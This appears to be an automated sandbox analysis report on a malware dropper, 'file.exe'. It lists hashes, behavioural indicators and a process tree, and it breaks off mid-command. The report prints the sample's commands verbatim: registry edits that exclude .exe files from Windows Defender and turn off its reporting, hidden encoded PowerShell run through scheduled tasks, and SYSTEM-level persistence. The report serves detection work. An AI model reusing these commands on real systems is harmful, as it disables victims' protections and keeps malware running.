Analysis
-
max time kernel
92s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
26-12-2022 22:53
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
9ac5d9230be41bd9aa76591d79c1d1cf
-
SHA1
093ff68869288740d0ef4b1a77739a164b367658
-
SHA256
d394c46093850eeae163d901fec280ce9852fc94fff9505e149acba35e7a8cb4
-
SHA512
97363b67395a8fa5ea5d5a90b61d0849374bc09913d8771ed5c4cd32e3ad35aea804b14b8947b55da73be9e61d61ea1d000758dbd2e2c96d17033e38694d8bd9
-
SSDEEP
196608:91OhbIyho1wkS6zSV1m/drYfQWGsM7b2JF8Pw/:3OxIGAwxJ8Yf9GsMKJWw/
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 58 4752 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4708 Install.exe 4296 Install.exe 4080 vvsOeNa.exe 4808 jCjqzOv.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation jCjqzOv.exe -
Loads dropped DLL 1 IoCs
pid Process 4752 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json jCjqzOv.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini jCjqzOv.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2 jCjqzOv.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D jCjqzOv.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini vvsOeNa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2 jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 jCjqzOv.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol vvsOeNa.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jCjqzOv.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache jCjqzOv.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData jCjqzOv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C jCjqzOv.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol jCjqzOv.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi jCjqzOv.exe File created C:\Program Files (x86)\QxhTRhBLgDrU2\DXwqrhlRCjfTa.dll jCjqzOv.exe File created C:\Program Files (x86)\wqPaCWxmyWUn\sEhAcjq.dll jCjqzOv.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi jCjqzOv.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja jCjqzOv.exe File created C:\Program Files (x86)\zopNtCPofqZRshxFhVR\EZplGui.dll jCjqzOv.exe File created C:\Program Files (x86)\eSoSRLDipKupC\FtQoKXJ.dll jCjqzOv.exe File created C:\Program Files (x86)\eSoSRLDipKupC\OzLzsDs.xml jCjqzOv.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak jCjqzOv.exe File created C:\Program Files (x86)\zopNtCPofqZRshxFhVR\BmWqhNg.xml jCjqzOv.exe File created C:\Program Files (x86)\TloWHzQxU\yUcksdc.xml jCjqzOv.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak jCjqzOv.exe File created C:\Program Files (x86)\QxhTRhBLgDrU2\IZIGPxF.xml jCjqzOv.exe File created C:\Program Files (x86)\TloWHzQxU\XqhRjT.dll jCjqzOv.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\lCFTjNOFEcSKwrIvx.job schtasks.exe File created C:\Windows\Tasks\bhiKLDYYmOVJYRnmNA.job schtasks.exe File created C:\Windows\Tasks\jAPQkthTMSklmsWLq.job schtasks.exe File created C:\Windows\Tasks\rSkSwYHQOxYzETV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2592 schtasks.exe 4608 schtasks.exe 4384 schtasks.exe 1288 schtasks.exe 4448 schtasks.exe 3132 schtasks.exe 8 schtasks.exe 2740 schtasks.exe 4180 schtasks.exe 1248 schtasks.exe 1464 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000}\NukeOnDelete = "0" jCjqzOv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" jCjqzOv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" jCjqzOv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jCjqzOv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket jCjqzOv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ jCjqzOv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix jCjqzOv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" jCjqzOv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d26ecb05-0000-0000-0000-d01200000000} jCjqzOv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 1880 powershell.EXE 1880 powershell.EXE 3044 powershell.exe 3044 powershell.exe 3800 powershell.exe 3800 powershell.exe 4220 powershell.EXE 4220 powershell.EXE 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe 4808 jCjqzOv.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1880 powershell.EXE Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 3800 powershell.exe Token: SeDebugPrivilege 4220 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3124 wrote to memory of 4708 3124 file.exe 82 PID 3124 wrote to memory of 4708 3124 file.exe 82 PID 3124 wrote to memory of 4708 3124 file.exe 82 PID 4708 wrote to memory of 4296 4708 Install.exe 83 PID 4708 wrote to memory of 4296 4708 Install.exe 83 PID 4708 wrote to memory of 4296 4708 Install.exe 83 PID 4296 wrote to memory of 3508 4296 Install.exe 84 PID 4296 wrote to memory of 3508 4296 Install.exe 84 PID 4296 wrote to memory of 3508 4296 Install.exe 84 PID 4296 wrote to memory of 1956 4296 Install.exe 86 PID 4296 wrote to memory of 1956 4296 Install.exe 86 PID 4296 wrote to memory of 1956 4296 Install.exe 86 PID 3508 wrote to memory of 5100 3508 forfiles.exe 88 PID 3508 wrote to memory of 5100 3508 forfiles.exe 88 PID 3508 wrote to memory of 5100 3508 forfiles.exe 88 PID 1956 wrote to memory of 2544 1956 forfiles.exe 89 PID 1956 wrote to memory of 2544 1956 forfiles.exe 89 PID 1956 wrote to memory of 2544 1956 forfiles.exe 89 PID 5100 wrote to memory of 2344 5100 cmd.exe 90 PID 5100 wrote to memory of 2344 5100 cmd.exe 90 PID 5100 wrote to memory of 2344 5100 cmd.exe 90 PID 2544 wrote to memory of 1168 2544 cmd.exe 91 PID 2544 wrote to memory of 1168 2544 cmd.exe 91 PID 2544 wrote to memory of 1168 2544 cmd.exe 91 PID 5100 wrote to memory of 1984 5100 cmd.exe 92 PID 5100 wrote to memory of 1984 5100 cmd.exe 92 PID 5100 wrote to memory of 1984 5100 cmd.exe 92 PID 2544 wrote to memory of 2176 2544 cmd.exe 93 PID 2544 wrote to memory of 2176 2544 cmd.exe 93 PID 2544 wrote to memory of 2176 2544 cmd.exe 93 PID 4296 wrote to memory of 1248 4296 Install.exe 94 PID 4296 wrote to memory of 1248 4296 Install.exe 94 PID 4296 wrote to memory of 1248 4296 Install.exe 94 PID 4296 wrote to memory of 4900 4296 Install.exe 96 PID 4296 wrote to memory of 4900 4296 Install.exe 96 PID 4296 wrote to memory of 4900 4296 Install.exe 96 PID 1880 wrote to memory of 4264 1880 powershell.EXE 100 PID 1880 wrote to memory of 4264 1880 powershell.EXE 100 PID 4296 wrote to memory of 624 4296 Install.exe 111 PID 4296 wrote to memory of 624 4296 Install.exe 111 PID 4296 wrote to memory of 624 4296 Install.exe 111 PID 4296 wrote to memory of 1464 4296 Install.exe 114 PID 4296 wrote to memory of 1464 4296 Install.exe 114 PID 4296 wrote to memory of 1464 4296 Install.exe 114 PID 4080 wrote to memory of 3044 4080 vvsOeNa.exe 117 PID 4080 wrote to memory of 3044 4080 vvsOeNa.exe 117 PID 4080 wrote to memory of 3044 4080 vvsOeNa.exe 117 PID 3044 wrote to memory of 3132 3044 powershell.exe 119 PID 3044 wrote to memory of 3132 3044 powershell.exe 119 PID 3044 wrote to memory of 3132 3044 powershell.exe 119 PID 3132 wrote to memory of 4624 3132 cmd.exe 120 PID 3132 wrote to memory of 4624 3132 cmd.exe 120 PID 3132 wrote to memory of 4624 3132 cmd.exe 120 PID 3044 wrote to memory of 3428 3044 powershell.exe 121 PID 3044 wrote to memory of 3428 3044 powershell.exe 121 PID 3044 wrote to memory of 3428 3044 powershell.exe 121 PID 3044 wrote to memory of 1296 3044 powershell.exe 122 PID 3044 wrote to memory of 1296 3044 powershell.exe 122 PID 3044 wrote to memory of 1296 3044 powershell.exe 122 PID 3044 wrote to memory of 332 3044 powershell.exe 123 PID 3044 wrote to memory of 332 3044 powershell.exe 123 PID 3044 wrote to memory of 332 3044 powershell.exe 123 PID 3044 wrote to memory of 792 3044 powershell.exe 124 PID 3044 wrote to memory of 792 3044 powershell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Users\Admin\AppData\Local\Temp\7zS694E.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\7zS6C0D.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2344
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1984
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1168
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2176
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpTVaalyq" /SC once /ST 15:43:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpTVaalyq"4⤵PID:4900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpTVaalyq"4⤵PID:624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhiKLDYYmOVJYRnmNA" /SC once /ST 23:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\vvsOeNa.exe\" LE /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1464
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4264
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1812
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\vvsOeNa.exeC:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\UsCmcJSqHTXYNvr\vvsOeNa.exe LE /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 